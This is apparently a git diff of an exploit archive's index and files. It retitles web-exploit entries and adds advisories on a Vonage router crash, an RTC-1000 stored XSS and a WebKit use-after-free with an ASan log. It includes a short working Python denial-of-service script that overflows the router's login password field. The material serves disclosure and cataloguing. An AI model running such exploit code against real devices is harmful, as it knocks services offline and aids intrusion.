6213,platforms/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 - Insecure Cookie Handling",2008-08-06,Scary-Boys,php,webapps,0 6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 - 'searchid' SQL Injection",2008-08-06,james,php,webapps,0 @@ -20288,7 +20298,7 @@ id,file,description,date,author,platform,type,port 6475,platforms/php/webapps/6475.txt,"PHP Crawler 0.8 - Remote File Inclusion",2008-09-17,Piker,php,webapps,0 6478,platforms/php/webapps/6478.txt,"Technote 7 - 'shop_this_skin_path' Remote File Inclusion",2008-09-17,webDEViL,php,webapps,0 6480,platforms/php/webapps/6480.txt,"X10media Mp3 Search Engine 1.5.5 - Remote File Inclusion",2008-09-17,THUNDER,php,webapps,0 -6482,platforms/php/webapps/6482.txt,"addalink 4 Beta - Write Approved Links Remote",2008-09-17,Pepelux,php,webapps,0 +6482,platforms/php/webapps/6482.txt,"addalink 4 Beta - Write Approved Links",2008-09-17,Pepelux,php,webapps,0 6483,platforms/php/webapps/6483.txt,"E-PHP CMS - 'article.php' SQL Injection",2008-09-18,HaCkeR_EgY,php,webapps,0 6485,platforms/php/webapps/6485.txt,"addalink 4 - 'category_id' SQL Injection",2008-09-18,ka0x,php,webapps,0 6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 - 'random' SQL Injection",2008-09-18,SuNHouSe2,php,webapps,0 @@ -21066,7 +21076,7 @@ id,file,description,date,author,platform,type,port 7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum - Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0 7451,platforms/php/webapps/7451.txt,"PHP weather 2.2.2 - Local File Inclusion / Cross-Site Scripting",2008-12-14,ahmadbady,php,webapps,0 7453,platforms/php/webapps/7453.txt,"FLDS 1.2a - 'redir.php' SQL Injection",2008-12-14,nuclear,php,webapps,0 -7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - 'download.php' Remote",2008-12-14,x0r,php,webapps,0 +7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - 'download.php' Priviledge Escalation",2008-12-14,x0r,php,webapps,0 7456,platforms/php/webapps/7456.txt,"AvailScript Article Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0 7457,platforms/php/webapps/7457.txt,"AvailScript Classmate Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0 7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 - 'lang' Local File Inclusion",2008-12-14,Osirys,php,webapps,0 @@ -21499,7 +21509,7 @@ id,file,description,date,author,platform,type,port 8086,platforms/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 8087,platforms/cgi/webapps/8087.txt,"i-dreams GB Server - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - 'admin.txt' File Disclosure",2009-02-20,Pouya_Server,php,webapps,0 -8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' Command Injection 'via SQL Injection'",2009-02-20,Osirys,php,webapps,0 +8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' Command Injection / SQL Injection",2009-02-20,Osirys,php,webapps,0 8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Unauthenticated Admin Bypass",2009-02-23,ahmadbady,php,webapps,0 8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - 'notes.php' Remote Command Execution",2009-02-23,JosS,php,webapps,0 8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0 @@ -21835,7 +21845,7 @@ id,file,description,date,author,platform,type,port 8731,platforms/php/webapps/8731.php,"Joomla! Component com_gsticketsystem - 'catid' Blind SQL Injection",2009-05-19,InjEctOr5,php,webapps,0 8734,platforms/asp/webapps/8734.txt,"Namad (IMenAfzar) 2.0.0.0 - Remote File Disclosure",2009-05-19,Securitylab.ir,asp,webapps,0 8735,platforms/php/webapps/8735.txt,"PAD Site Scripts 3.6 - Insecure Cookie Handling",2009-05-19,Mr.tro0oqy,php,webapps,0 -8736,platforms/php/webapps/8736.pl,"Coppermine Photo Gallery 1.4.22 - Remote",2009-05-19,girex,php,webapps,0 +8736,platforms/php/webapps/8736.pl,"Coppermine Photo Gallery 1.4.22 - SQL Injection",2009-05-19,girex,php,webapps,0 8737,platforms/php/webapps/8737.txt,"vidshare pro - SQL Injection / Cross-Site Scripting",2009-05-19,snakespc,php,webapps,0 8738,platforms/php/webapps/8738.txt,"Dog Pedigree Online Database 1.0.1b - Multiple SQL Injections",2009-05-19,YEnH4ckEr,php,webapps,0 8739,platforms/php/webapps/8739.txt,"Dog Pedigree Online Database 1.0.1b - Insecure Cookie Handling",2009-05-19,YEnH4ckEr,php,webapps,0 @@ -22616,7 +22626,7 @@ id,file,description,date,author,platform,type,port 10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server - Directory Traversal",2009-12-06,mr_me,windows,webapps,0 10337,platforms/php/webapps/10337.txt,"Chipmunk NewsLetter - Persistent Cross-Site Scripting",2009-12-07,mr_me,php,webapps,0 10341,platforms/php/webapps/10341.txt,"SiSplet CMS 2008-01-24 - Multiple Remote File Inclusions",2009-12-07,cr4wl3r,php,webapps,0 -10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 -",2009-12-07,Global-Evolution,hardware,webapps,0 +10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 - Multiple Vulnerabilities",2009-12-07,Global-Evolution,hardware,webapps,0 10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-Commerce Group - SQL Injection",2009-12-08,"Dr.0rYX & Cr3W-DZ",php,webapps,0 10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-12-07,"Amol Naik",php,webapps,0 10354,platforms/php/webapps/10354.txt,"Viscacha 0.8 Gold - Persistent Cross-Site Scripting",2009-12-08,mr_me,php,webapps,0 @@ -22754,7 +22764,7 @@ id,file,description,date,author,platform,type,port 10549,platforms/php/webapps/10549.txt,"Joomla! Component Event Manager - Blind SQL Injection",2009-12-18,FL0RiX,php,webapps,0 10550,platforms/php/webapps/10550.txt,"Joomla! Component City Portal - Blind SQL Injection",2009-12-18,FL0RiX,php,webapps,0 10552,platforms/php/webapps/10552.txt,"FestOs 2.2.1 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,php,webapps,0 -10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007 -",2009-12-19,Global-Evolution,php,webapps,0 +10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007 - Multiple Vulnerabilities",2009-12-19,Global-Evolution,php,webapps,0 10558,platforms/asp/webapps/10558.txt,"Toast Forums 1.8 - Database Disclosure",2009-12-19,ViRuSMaN,asp,webapps,0 10560,platforms/php/webapps/10560.txt,"Lizard Cart - Multiple SQL Injections",2009-12-19,cr4wl3r,php,webapps,0 10561,platforms/php/webapps/10561.txt,"CFAGCMS - SQL Injection",2009-12-19,cr4wl3r,php,webapps,0 @@ -25208,7 +25218,7 @@ id,file,description,date,author,platform,type,port 16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon - SQL Injection",2011-01-17,Saif,php,webapps,0 16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0 16010,platforms/php/webapps/16010.txt,"Joomla! Component allCineVid 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0 -16011,platforms/php/webapps/16011.txt,"CakePHP 1.3.5/1.2.8 - 'Unserialize()'",2011-01-18,felix,php,webapps,0 +16011,platforms/php/webapps/16011.txt,"CakePHP 1.3.5/1.2.8 - 'Unserialize()' File Inclusion",2011-01-18,felix,php,webapps,0 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Cross-Site Request Forgery (Admin Add)",2011-01-18,anT!-Tr0J4n,php,webapps,0 17209,platforms/php/webapps/17209.txt,"SoftMP3 - SQL Injection",2011-04-24,mArTi,php,webapps,0 16016,platforms/php/webapps/16016.txt,"Simploo CMS 1.7.1 - PHP Code Execution",2011-01-19,"David Vieira-Kurz",php,webapps,0 @@ -25319,7 +25329,7 @@ id,file,description,date,author,platform,type,port 16267,platforms/php/webapps/16267.txt,"Bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0 16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8/3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps,0 16273,platforms/php/webapps/16273.php,"WordPress Plugin PHP Speedy 0.5.2 - 'admin_container.php' Remote Code Execution",2011-03-04,mr_me,php,webapps,0 -16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote",2011-03-04,kingcope,jsp,webapps,0 +16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution",2011-03-04,kingcope,jsp,webapps,0 16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs - 'view.php' SQL Injection",2011-03-04,IRAQ_JAGUAR,php,webapps,0 16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,AtT4CKxT3rR0r1ST,php,webapps,0 16280,platforms/php/webapps/16280.py,"vTiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,php,webapps,0 @@ -31354,7 +31364,7 @@ id,file,description,date,author,platform,type,port 30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0 30085,platforms/linux/webapps/30085.txt,"Zimbra 2009-2013 - Local File Inclusion",2013-12-06,rubina119,linux,webapps,0 30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injections",2007-05-14,"Jesper Jurcenoks",php,webapps,0 -30036,platforms/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 -",2007-05-14,"David Kierznowski",php,webapps,0 +30036,platforms/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting",2007-05-14,"David Kierznowski",php,webapps,0 30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 Email - 'FormMail.php' Input Validation",2007-05-15,"Jesper Jurcenoks",php,webapps,0 30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 - '/view/search/?path' Cross-Site Scripting",2007-05-15,"Mikhail Markin",php,webapps,0 30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Cross-Site Scripting Vulnerabilities",2007-05-15,"Mikhail Markin",php,webapps,0 @@ -31818,6 +31828,7 @@ id,file,description,date,author,platform,type,port 30275,platforms/java/webapps/30275.txt,"OpManager 6/7 - '/admin/DeviceAssociation.do' Multiple Cross-Site Scripting Vulnerabilities",2007-07-04,Lostmon,java,webapps,0 30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 - 'login.php' Multiple Local File Inclusions",2007-07-05,"Adriel T. Desautels",php,webapps,0 30282,platforms/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 - 'Oku.asp' SQL Injection",2007-07-07,GeFORC3,asp,webapps,0 +30286,platforms/linux/webapps/30286.txt,"ImgSvr 0.6 - 'Template' Local File Inclusion",2007-07-10,"Tim Brown",linux,webapps,0 30289,platforms/asp/webapps/30289.txt,"EnViVo!CMS - 'default.asp?ID' SQL Injection",2007-07-11,durito,asp,webapps,0 30290,platforms/php/webapps/30290.txt,"IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities",2007-07-11,"Alex Hernandez",php,webapps,0 30293,platforms/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",php,webapps,0 @@ -34057,6 +34068,7 @@ id,file,description,date,author,platform,type,port 34071,platforms/php/webapps/34071.txt,"Joomla! Component com_sar_news - 'id' SQL Injection",2010-06-02,LynX,php,webapps,0 34072,platforms/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,php,webapps,0 34073,platforms/php/webapps/34073.py,"TCExam 10.1.7 - '/admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload",2010-06-02,"John Leitch",php,webapps,0 +34136,platforms/multiple/webapps/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,webapps,0 34086,platforms/linux/webapps/34086.txt,"BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 34087,platforms/php/webapps/34087.txt,"Joomla! Component Youtube Gallery 4.1.7 - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80 34153,platforms/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0 @@ -38852,3 +38864,4 @@ id,file,description,date,author,platform,type,port 43138,platforms/php/webapps/43138.rb,"Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload",2017-11-13,0xFFFFFF,php,webapps,0 43140,platforms/php/webapps/43140.txt,"Kirby CMS < 2.5.7 - Cross-Site Scripting",2017-11-13,"Ishaq Mohammed",php,webapps,0 43155,platforms/php/webapps/43155.txt,"Zeta Components Mail 1.8.1 - Remote Code Execution",2017-11-16,MalwareBenchmark,php,webapps,0 +43158,platforms/hardware/webapps/43158.txt,"Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting",2017-11-17,"Keith Thome",hardware,webapps,0 diff --git a/platforms/aix/dos/19045.txt b/platforms/aix/local/19045.txt similarity index 100% rename from platforms/aix/dos/19045.txt rename to platforms/aix/local/19045.txt diff --git a/platforms/hardware/dos/43164.py b/platforms/hardware/dos/43164.py new file mode 100755 index 000000000..a55f09491 --- /dev/null +++ b/platforms/hardware/dos/43164.py @@ -0,0 +1,23 @@ +Overview +During an evaluation of the Vonage home phone router, it was identified that the loginUsername and loginPassword parameters were vulnerable to a buffer overflow. This overflow caused the router to crash and reboot. Further analysis will be performed to find out if the the crash is controllable and allow for full remote code execution. + +Device Description: +1 port residential gateway + +Hardware Version: +VDV-23: 115 + +Original Software Version: +3.2.11-0.9.40 + +Exploitation Writeup +This exploit was a simple buffer overflow. The use of spike fuzzer took place to identify the crash condition. When the application crashes, the router reboots causing a denial of service condition. The script below was further weaponized to sleep for a 60 second period while the device rebooted then continue one execution after another. + +Proof of concept code: +The code below was used to exploit the application. This testing was only performed against denial of service conditions. The crash that was experienced potentially holds the ability to allow remote code execution. Further research will be performed against the device. + +DOSTest.py + +import requests
 +passw = 'A' * 10580
post_data = {'loginUsername':'router', 'loginPassword':passw, 'x':'0', 'y':'0'}
 +post_response = requests.post(url='http://192.168.15.1/goform/login', data=post_data) \ No newline at end of file diff --git a/platforms/hardware/webapps/43158.txt b/platforms/hardware/webapps/43158.txt new file mode 100644 index 000000000..7ed1825fc --- /dev/null +++ b/platforms/hardware/webapps/43158.txt @@ -0,0 +1,46 @@ +# Exploit Title: Icon Time Systems RTC-1000 (<= v2.5.7458) Universal Time Clocks Stored XSS Vulnerability +# Date: 17-11-2017 +# Vendor: http://www.icontime.com/ +# Version: <= v2.5.7458 +# Exploit Author: Keith Thome +# Contact: https://twitter.com/keiththome +# Website: https://www.keiththome.com/rtc-1000-vuln +# CVE: CVE-2017-16819 +# Type: Remote +# Platform: Hardware + +========================================================== + +# Introduction +The Icon Time Systems RTC-1000 (firmware v2.5.7458 and below) Universal Time Clock device is susceptible to a stored Cross Site Scripting (XSS) vulnerability that facilitates session hijacking. Injecting a session hijacking XSS payload into the ‘First Name’ field of an employee record on the employee.html webpage results in payload execution wherever this employee's first name appears in subsequent webpages. Caveat: To exploit this vulnerability, the attacker does need valid credentials to access the device and those credentials must have permissions to change employee names. + +========================================================== + +# Vulnerable URL (Employee Maintenance Module) +/employee.html + +# Vulnerable parameter(s) +- First Name input ID: nameFirst + +# Sample payload + + +========================================================== + +# PROOF OF CONCEPT +- With valid credentials that has permissions to modify the employee records, access the employeelist.html page via Lists->Employees +- Click on an active employee or Show Inactive to modify an employee record. +- Click on the employee id or name to access the vulnerable employee.html page. +- In the First Name field, enter a XSS payload. +- Click Submit +- Once any user accesses a page where that employee's first name is displayed, the XSS will be executed. Ie. employeelist.html that lists all employees. + +========================================================== + +# Timeline +- 09/08/2017 - Vulnerability discovered. +- 09/15/2017 - Vendor informed. +- 09/19/2017 - Vendor informed. +- 09/19/2017 - Vendor acknowleged and indicated patch development underway. +- 10/24/2017 - Emailed vendor for update. No response. +- 11/17/2017 - Public Disclosure \ No newline at end of file diff --git a/platforms/irix/local/19273.sh b/platforms/irix/local/19273.sh index 1463ca457..06c6cc98c 100755 --- a/platforms/irix/local/19273.sh +++ b/platforms/irix/local/19273.sh @@ -1,8 +1,9 @@ -source: http://www.securityfocus.com/bid/345/info - -A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root. - -day5notifier wisely replaces a number of system() calls with execve() calls. However, the code was translated to run a copy of /bin/sh as the processor in the execve. As such, all the security problems associated with using a system() call in a setuid program remain. +#!/bin/sh +#source: http://www.securityfocus.com/bid/345/info +# +#A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root. +# +#day5notifier wisely replaces a number of system() calls with execve() calls. However, the code was translated to run a copy of /bin/sh as the processor in the execve. As such, all the security problems associated with using a system() call in a setuid program remain. #!/bin/sh # reg4root - Register me for Root! diff --git a/platforms/irix/local/19310.c b/platforms/irix/local/19310.c index f48d7d2b1..a0e4419ef 100644 --- a/platforms/irix/local/19310.c +++ b/platforms/irix/local/19310.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/392/info -A buffer overflow exists in the /bin/login program supplied by Silicon Graphics, as part of their Irix operating system. By supplying a carefullly crafted, log buffer to the -h option of login, a local user can obtain root privileges. +A buffer overflow exists in the /bin/login program supplied by Silicon Graphics, as part of their Irix operating system. By supplying a carefully crafted, log buffer to the -h option of login, a local user can obtain root privileges. +*/ /* /bin/login exploit by DCRH 24/5/97 * diff --git a/platforms/irix/local/19706.sh b/platforms/irix/local/19706.sh index ed41bd3e3..ed58f0c72 100755 --- a/platforms/irix/local/19706.sh +++ b/platforms/irix/local/19706.sh @@ -1,6 +1,8 @@ -source: http://www.securityfocus.com/bid/909/info - -SGI's Irix operating system ships with an X11 application called 'soundplayer' which is used to play .WAV files. It is not setuid root by itself, but can inherit root priviliges if called by midikeys (which is setuid on some old IRIX systems). Soundplayer is vulnerable to an input validation problem. When saving a file to disk with soundplayer, if a semicolon is appended to the end of the "proper" or "real" filename input followed by a command to be executed (no spaces), the command will run with the privileges soundplayer has (elevated or not). It is possible to compromise root access locally through exploitation of this vulnerability if soundplayer is executed (then exploited..) through setuid midikeys. +#!/bin/sh +#source: http://www.securityfocus.com/bid/909/info +# +#SGI's Irix operating system ships with an X11 application called 'soundplayer' which is used to play .WAV files. It is not setuid root by itself, but can inherit root privileges if called by midikeys (which is setuid on some old IRIX systems). Soundplayer is vulnerable to an input validation problem. When saving a file to disk with soundplayer, if a semicolon is appended to the end of the "proper" or "real" filename input followed by a command to be executed (no spaces), the command will run with the privileges soundplayer has (elevated or not). It is possible to compromise root access locally through exploitation of this vulnerability if soundplayer is executed (then exploited..) through setuid midikeys. +# #!/bin/sh # diff --git a/platforms/linux/remote/38.pl b/platforms/linux/dos/38.pl similarity index 100% rename from platforms/linux/remote/38.pl rename to platforms/linux/dos/38.pl diff --git a/platforms/linux/local/19254.c b/platforms/linux/local/19254.c index 17036693a..2f01b9ee8 100644 --- a/platforms/linux/local/19254.c +++ b/platforms/linux/local/19254.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/319/info Linux gnuplot 3.5 is shipped with S.u.S.E. Linux 5.2 and installed suid root by default. There is a buffer overflow vulnerability present in gnuplot which allows for users to obtain root access locally. +*/ /* diff --git a/platforms/linux/local/19565.sh b/platforms/linux/local/19565.sh index 7c2a97ee1..135088dec 100755 --- a/platforms/linux/local/19565.sh +++ b/platforms/linux/local/19565.sh @@ -1,8 +1,9 @@ -source: http://www.securityfocus.com/bid/738/info - -cdwtools is a package of utilities for cd-writing. The linux version of these utilities, which ships with S.u.S.E linux 6.1 and 6.2, is vulnerable to several local root compromises. It is known that there are a number of ways to exploit these packages, including buffer overflows and /tmp symlink attacks. - ---- cdda2x.sh --- +#! /bin/sh +#source: http://www.securityfocus.com/bid/738/info +# +#cdwtools is a package of utilities for cd-writing. The linux version of these utilities, which ships with S.u.S.E linux 6.1 and 6.2, is vulnerable to several local root #compromises. It is known that there are a number of ways to exploit these packages, including buffer overflows and /tmp symlink attacks. +# +#--- cdda2x.sh --- #! /bin/sh # # Shell script for Linux x86 cdda2cdr exploit diff --git a/platforms/linux/local/19900.c b/platforms/linux/local/19900.c index a0d9d5058..11872503b 100644 --- a/platforms/linux/local/19900.c +++ b/platforms/linux/local/19900.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/1176/info A vulnerability exists in the pam_console PAM module, included as part of any Linux system running PAM. pam_console exists to own certain devices to users logging in to the console of a Linux machine. It is designed to allow only console users to utilize things such as sound devices. It will chown devices to users upon logging in, and chown them back to being owned by root upon logout. However, as certain devices do not have a 'hangup' mechanism, like a tty device, it is possible for a local user to continue to monitor activity on certain devices after logging out. This could allow an malicious user to sniff other users console sessions, and potentially obtain the root password if the root user logs in, or a user su's to root. They could also surreptitiously execute commands as the user on the console. +*/ #include diff --git a/platforms/linux/local/23154.c b/platforms/linux/local/23154.c index c28a2ac41..87fc9aa71 100644 --- a/platforms/linux/local/23154.c +++ b/platforms/linux/local/23154.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/8641/info Sendmail is prone to a buffer overrun vulnerability in the prescan() function. This issue is different than the vulnerability described in BID 7230. This vulnerability could permit remote attackers to execute arbitrary code via vulnerable versions of Sendmail. +*/ /* Local exploit for the old sendmail vuln found by lcamtuf in 8.12.9 and below. * by Gyan Chawdhary, gunnu45@hotmail.com diff --git a/platforms/linux/remote/405.c b/platforms/linux/local/405.c similarity index 100% rename from platforms/linux/remote/405.c rename to platforms/linux/local/405.c diff --git a/platforms/linux/local/23740.c b/platforms/linux/remote/23740.c similarity index 96% rename from platforms/linux/local/23740.c rename to platforms/linux/remote/23740.c index 996252e8e..828cd510e 100644 --- a/platforms/linux/local/23740.c +++ b/platforms/linux/remote/23740.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/9715/info hsftp has been found to be prone to a remote print format string vulnerability. This issue is due to the application improper use of a format printing function. Ultimately this vulnerability could allow for execution of arbitrary code on the system implementing the affected software, which would occur in the security context of the server process. +*/ // priestmasters hsftp <=1.11 remote format string exploit // mail: priest@priestmaster.org diff --git a/platforms/linux/remote/30286.txt b/platforms/linux/webapps/30286.txt similarity index 100% rename from platforms/linux/remote/30286.txt rename to platforms/linux/webapps/30286.txt diff --git a/platforms/linux/remote/6026.pl b/platforms/linux/webapps/6026.pl similarity index 100% rename from platforms/linux/remote/6026.pl rename to platforms/linux/webapps/6026.pl diff --git a/platforms/multiple/dos/43166.js b/platforms/multiple/dos/43166.js new file mode 100644 index 000000000..5297011da --- /dev/null +++ b/platforms/multiple/dos/43166.js @@ -0,0 +1,213 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1344 + +There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. + +PoC: + +================================================================= +*/ + + + + + +foo + + + + +/* +================================================================= + +ASan log: + +================================================================= +==29647==ERROR: AddressSanitizer: heap-use-after-free on address 0x61e00005d0d8 at pc 0x00010a64aa4b bp 0x7fff5b813380 sp 0x7fff5b813378 +READ of size 8 at 0x61e00005d0d8 thread T0 +==29647==WARNING: invalid path to external symbolizer! +==29647==WARNING: Failed to use and restart external symbolizer! + #0 0x10a64aa4a in WebCore::TreeScope::documentScope() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5a4a) + #1 0x10aa1044f in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cb44f) + #2 0x10b4602bd in WebCore::HTMLScriptElement::~HTMLScriptElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe1b2bd) + #3 0x1188b9845 in void JSC::MarkedBlock::Handle::specializedSweep(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(void*)::operator()(void*) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1410845) + #4 0x1188b98fa in void JSC::MarkedBlock::Handle::specializedSweep(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x14108fa) + #5 0x1188b5fcd in void JSC::MarkedBlock::Handle::specializedSweep(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x140cfcd) + #6 0x1188afced in void JSC::MarkedBlock::Handle::finishSweepKnowingSubspace(JSC::FreeList*, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1406ced) + #7 0x1188af34e in void JSC::MarkedBlock::Handle::finishSweepKnowingSubspace(JSC::FreeList*, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x140634e) + #8 0x1188aefa2 in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::FreeList*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1405fa2) + #9 0x118b641ab in JSC::MarkedBlock::Handle::sweep(JSC::FreeList*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16bb1ab) + #10 0x118b5f2e2 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16b62e2) + #11 0x118b5ec1a in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16b5c1a) + #12 0x118b5fce6 in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16b6ce6) + #13 0x118f305f2 in JSC::Subspace::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1a875f2) + #14 0x10b9f5219 in void* JSC::allocateCell(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13b0219) + #15 0x10b9f4e89 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13afe89) + #16 0x10b9f4dcb in std::__1::enable_if::value, WebCore::JSDOMWrapperConverterTraits::WrapperClass*>::type WebCore::createWrapper(WebCore::JSDOMGlobalObject*, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13afdcb) + #17 0x10b9f4b99 in std::__1::enable_if::value), WebCore::JSDOMWrapperConverterTraits::WrapperClass*>::type WebCore::createWrapper(WebCore::JSDOMGlobalObject*, 